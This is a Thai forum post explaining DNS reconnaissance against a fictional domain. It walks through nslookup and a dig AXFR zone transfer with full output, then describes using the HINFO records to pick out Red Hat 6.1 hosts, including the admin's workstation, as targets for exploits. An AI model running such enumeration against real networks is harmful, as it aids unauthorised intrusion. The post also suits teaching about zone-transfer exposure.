การโจมตี DNS Server ที่ใช้ BIND เวอร์ชัน 8

**nick69816** · 08-10-2006, 01:00 PM

การโจมตี: ผู้โจมตีหาข้อมูลจาก DNS server ให้ได้มากที่สุดสมมติว่าโดเมนของเป้าหมายคือ dumb.target.jay เราต้องการรู้ว่า name server ของ dumb.tarbet.jay คืออะไรจึงใช้คำสั่ง nslookup ในยูนิกซ์ ดังต่อไปนี้:

[jay@max jay]$ nslookup
Default Server: ns.my.isp
Address: 10.0.0.1
> set q=ns
> dumb.target.jay
Server: ns.my.isp
Address: 10.0.0.1
Non-authoritative answer:
dumb.target.jay nameserver = dumb.target.jay
dumb.target.jay nameserver = ns2.dumb.target.jay
Authoritative answers can be found from:
dumb.target.jay internet address = 192.168.1.85
>

ต่อมาเมื่อรู้ว่าอะไรเป็น name server เพื่อใช้หาข้อมูล จึงถามเซิร์ฟเวอร์นี้ สำหรับรายการของโซน (zone)ใช้คำสั่ง dig เพื่อถามถึง zone transfer:

[jay@max zone]# dig @192.168.1.85 dumb.target.jay axfr
; <<>> DiG 8.2 <<>> @192.168.1.85 dumb.target.jay axfr
; (1 server found)
$ORIGIN dumb.target.jay.
@ 20H IN SOA ns1 hostmaster.dumb.target.jay
(2000111001 ; serial
5H ; refresh
1H ; retry
4d4h ; expire
1D ) ; minimum
1H IN NS dumb.target.jay.
20H IN NS ns.dumb.target.jay.
20H IN NS ns.dumbs.isp.
20H IN A 192.168.1.85
1D IN HINFO "Pentium 133" "Red Hat 6.1"
1D IN MX 10 mail
mail 1D IN A 192.168.1.2
really 1D IN A 192.168.1.20
1D IN TXT "Admin's Trusted Workstation"
1D IN HINFO "Athlon 850" "Red Hat 6.1"
rather 1D IN A 192.168.1.15
1D IN HINFO "Pentium 266" "Mandrake 7.1"
serious 1D IN CNAME extra
extra 1D IN A 192.168.1.80
ns 1D IN A 192.168.1.30
r_g 1D IN A 192.168.1.68
roblimo 1D IN MX 10 r_g
1D IN A 192.168.1.44
tahara 1D IN A 192.168.1.27

ดูจากข้อมูลที่เราได้จากการใช้คำสั่งสองคำสั่ง จะเห็นว่ามีรายชื่อของเครื่องทั้งหมดที่อยู่ในโซนนี้ นอกจากนี้
ถ้าคุณดูที่ HINFO คุณสามารถรู้ได้ว่าเครื่องเหล่านี้ใช้ลีนุกซ์อะไร ทำให้เรารู้อะไรบ้าง ถ้ามีรายการของ exploit
ที่ใช้ได้กับ Red Hat 6.1 ถ้าสามารถรู้ zone transfer และทำอย่างที่ทำข้างต้นและหา "Red Hat" จะพบ
เครื่องสองเครื่องที่เสี่ยงต่อการถูกโจมตีซึ่งรวมถึงเครื่อง workstation ของ sysadmin ด้วย จากนี้จึง
มุ่งความสนใจไปที่สองเครื่องนี้ซึ่งมักจะมีความเชื่อถือกันเองระหว่างสองเครื่องนี้ด้วย เป็นขึ้นตอนแรกสำหรับ
cracker เมื่อต้องการรู้ข้อมูลเกี่ยวกับเน็ตเวิร์คนั้น

Thread: การโจมตี DNS Server ที่ใช้ BIND เวอร์ชัน 8

Thread Tools

Similar Threads

ความคืบหน้าของการ์ดแบบ dual chip ของ Nvidia ที่ใช้ GF104

การโจมตี XSS ตอนที่ 1

การโจมตี แบบที่ไม่ควรมองข้าม อาจถูกพัฒนาใช้ต่อไป

โปรแกรมเล็ก ๆ ที่ใช้ เคลียล็อกไฟล์เวลาเจาะเข้าไปในเครื่องได้แล้ว

เปลี่ยน Port ที่ใช้ Remote Desktop

Members who have read this thread : 0

Tags for this Thread

Posting Permissions